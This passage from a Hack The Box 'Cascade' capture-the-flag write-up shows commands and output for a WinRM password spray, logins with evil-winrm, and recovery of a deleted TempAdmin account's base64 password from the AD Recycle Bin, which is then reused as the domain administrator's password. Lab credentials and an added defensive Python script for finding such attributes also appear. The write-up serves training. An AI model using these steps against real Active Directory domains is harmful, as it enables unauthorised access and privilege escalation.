WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\CascGuest:w3lc0meFr31nd
WINRM 10.10.10.182 5985 CASC-DC1 [+] cascade.local\arksvc:w3lc0meFr31nd (Pwn3d!)
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\s.smith:w3lc0meFr31nd
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\r.thompson:w3lc0meFr31nd
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\util:w3lc0meFr31nd
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\j.wakefield:w3lc0meFr31nd
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\s.hickson:w3lc0meFr31nd
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\j.goodhand:w3lc0meFr31nd
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\a.turnbull:w3lc0meFr31nd
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\e.crowe:w3lc0meFr31nd
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\b.hanson:w3lc0meFr31nd
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\d.burman:w3lc0meFr31nd
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\BackupSvc:w3lc0meFr31nd
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\j.allen:w3lc0meFr31nd
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\i.croft:w3lc0meFr31nd

20. Next, log in with this account and do some basic enumeration

┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -u arksvc -p "w3lc0meFr31nd" -i 10.10.10.182

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\arksvc\Documents> whoami
cascade\arksvc
*Evil-WinRM* PS C:\Users\arksvc\Documents> net user arksvc
User name arksvc
Full Name ArkSvc
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never

Password last set 1/9/2020 5:18:20 PM
Password expires Never
Password changeable 1/9/2020 5:18:20 PM
Password required Yes
User may change password No

Workstations allowed All
Logon script
User profile
Home directory
Last logon 5/13/2024 1:36:30 PM

Logon hours allowed All

Local Group Memberships *AD Recycle Bin *IT
*Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.

21. AD Recycle Bin is a well-known Windows group. Active Directory object recovery (the Recycle Bin) is a feature added in Server 2008 that lets administrators restore deleted objects, just as the Recycle Bin restores files. The linked article gives a PowerShell command to query all deleted objects in the domain:

*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects

Deleted : True
DistinguishedName : CN=CASC-WS1\0ADEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe,CN=Deleted Objects,DC=cascade,DC=local
Name : CASC-WS1
DEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe
ObjectClass : computer
ObjectGUID : 6d97daa4-2e82-4946-a11e-f91fa18bfabe

Deleted : True
DistinguishedName : CN=Scheduled Tasks\0ADEL:13375728-5ddb-4137-b8b8-b9041d1d3fd2,CN=Deleted Objects,DC=cascade,DC=local
Name : Scheduled Tasks
DEL:13375728-5ddb-4137-b8b8-b9041d1d3fd2
ObjectClass : group
ObjectGUID : 13375728-5ddb-4137-b8b8-b9041d1d3fd2

Deleted : True
DistinguishedName : CN={A403B701-A528-4685-A816-FDEE32BDDCBA}\0ADEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e,CN=Deleted Objects,DC=cascade,DC=local
Name : {A403B701-A528-4685-A816-FDEE32BDDCBA}
DEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e
ObjectClass : groupPolicyContainer
ObjectGUID : ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e

Deleted : True
DistinguishedName : CN=Machine\0ADEL:93c23674-e411-400b-bb9f-c0340bda5a34,CN=Deleted Objects,DC=cascade,DC=local
Name : Machine
DEL:93c23674-e411-400b-bb9f-c0340bda5a34
ObjectClass : container
ObjectGUID : 93c23674-e411-400b-bb9f-c0340bda5a34

Deleted : True
DistinguishedName : CN=User\0ADEL:746385f2-e3a0-4252-b83a-5a206da0ed88,CN=Deleted Objects,DC=cascade,DC=local
Name : User
DEL:746385f2-e3a0-4252-b83a-5a206da0ed88
ObjectClass : container
ObjectGUID : 746385f2-e3a0-4252-b83a-5a206da0ed88

Deleted : True
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
Name : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
ObjectClass : user
ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059

*Evil-WinRM* PS C:\Users\arksvc\Documents>

22. The last one is very interesting, because it is the temporary admin account mentioned in the old email I found earlier (which also said it used the same password as the normal administrator account). I can get all the details of that account:

*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -filter { SAMAccountName -eq "TempAdmin" } -includeDeletedObjects -property *


accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz
CN : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage : 0
countryCode : 0
Created : 1/27/2020 3:23:08 AM
createTimeStamp : 1/27/2020 3:23:08 AM
Deleted : True
Description :
DisplayName : TempAdmin
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName : TempAdmin
instanceType : 4
isDeleted : True
LastKnownParent : OU=Users,OU=UK,DC=cascade,DC=local
lastLogoff : 0
lastLogon : 0
logonCount : 0
Modified : 1/27/2020 3:24:34 AM
modifyTimeStamp : 1/27/2020 3:24:34 AM
msDS-LastKnownRDN : TempAdmin
Name : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : user
ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059
objectSid : S-1-5-21-3332504370-1206983947-1165150453-1136
primaryGroupID : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet : 132245689883479503
sAMAccountName : TempAdmin
sDRightsEffective : 0
userAccountControl : 66048
userPrincipalName : TempAdmin@cascade.local
uSNChanged : 237705
uSNCreated : 237695
whenChanged : 1/27/2020 3:24:34 AM
whenCreated : 1/27/2020 3:23:08 AM

*Evil-WinRM* PS C:\Users\arksvc\Documents>

23. Base64-decode the password that was found

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo YmFDVDNyMWFOMDBkbGVz | base64 -d
baCT3r1aN00dles
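As an added example (not code from the original writeup or from 0xdf), a small audit script in the spirit of steps 17 and 21 to 23: it parses Get-ADObject text output, including Recycle Bin objects, and flags attributes whose value is base64 that decodes to readable text, the way cascadeLegacyPwd did, while rejecting values that are encrypted rather than merely encoded, like the Ldap table blob in step 17. The sample dump is constructed from the TempAdmin output above, and the function names are my own.

```python
"""Audit a Get-ADObject attribute dump for leftover credential attributes.

Added example, not part of the original writeup: it parses the "Name : Value"
text that Get-ADObject -Property * prints and reports attributes whose value
is base64 that decodes to printable text (how cascadeLegacyPwd leaked).
"""
import base64
import re
import string

# Constructed sample, cut down from the TempAdmin output in the writeup.
# "DEL:<guid>" is a continuation line: a deleted object's RDN embeds a
# newline (\0A), so PowerShell prints the GUID part on its own line.
SAMPLE_DUMP = r"""
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz
Deleted : True
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
LastKnownParent : OU=Users,OU=UK,DC=cascade,DC=local
sAMAccountName : TempAdmin
"""

# Attribute lines have whitespace before the colon; "DEL:<guid>" does not,
# so it falls through to the continuation branch of the parser.
ATTR_LINE = re.compile(r"^(\S+)\s+:\s*(.*)$")
SUSPECT_NAME = re.compile(r"pwd|pass|secret|cred", re.IGNORECASE)
PRINTABLE = set(string.printable) - set("\t\n\r\x0b\x0c")


def parse_adobject_dump(text):
    """Return {attribute: value} from Get-ADObject style text output."""
    attrs, last = {}, None
    for line in text.splitlines():
        match = ATTR_LINE.match(line)
        if match:
            last = match.group(1)
            attrs[last] = match.group(2).strip()
        elif last is not None and line.strip():
            attrs[last] += line.strip()  # wrapped or continued value
    return attrs


def decode_if_text(value):
    """Decoded string if value is base64 of printable ASCII, else None."""
    # An encrypted blob (the Ldap table's BQO5l5Kj9MdErXx6Q6AGOw==) decodes
    # to non-text bytes and is rejected: encoded is not the same as encrypted.
    if len(value) < 8 or len(value) % 4:
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None
    if not text or any(ch not in PRINTABLE for ch in text):
        return None
    return text


def find_credential_attributes(attrs):
    """List (attribute, decoded value, confidence) for base64-text values."""
    findings = []
    for name, value in attrs.items():
        decoded = decode_if_text(value)
        if decoded is not None:
            confidence = "high" if SUSPECT_NAME.search(name) else "medium"
            findings.append((name, decoded, confidence))
    return findings


if __name__ == "__main__":
    for name, decoded, conf in find_credential_attributes(parse_adobject_dump(SAMPLE_DUMP)):
        print(f"[{conf}] {name} decodes to {decoded!r}")
```

Pointing the parser at a dump of every object returned with -includeDeletedObjects turns this into a quick check that no custom attribute is still carrying a password the Recycle Bin keeps alive after the account is deleted.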

24. Test whether this password is the administrator's password and whether it works

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec winrm 10.10.10.182 -u administrator -p baCT3r1aN00dles
SMB 10.10.10.182 5985 CASC-DC1 [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:cascade.local)
HTTP 10.10.10.182 5985 CASC-DC1 [*] http://10.10.10.182:5985/wsman
WINRM 10.10.10.182 5985 CASC-DC1 [+] cascade.local\administrator:baCT3r1aN00dles (Pwn3d!)


25. It works, so grab the final flag

┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -u administrator -p baCT3r1aN00dles -i 10.10.10.182

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt
b8ac5aea659109d68110ffeffc5a7e0e
*Evil-WinRM* PS C:\Users\Administrator\Documents>

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/235


Cascade-htb-writeup
https://sh1yan.top/2024/05/13/Cascade-htb-writeup/
Author
shiyan
Published on
May 13, 2024
License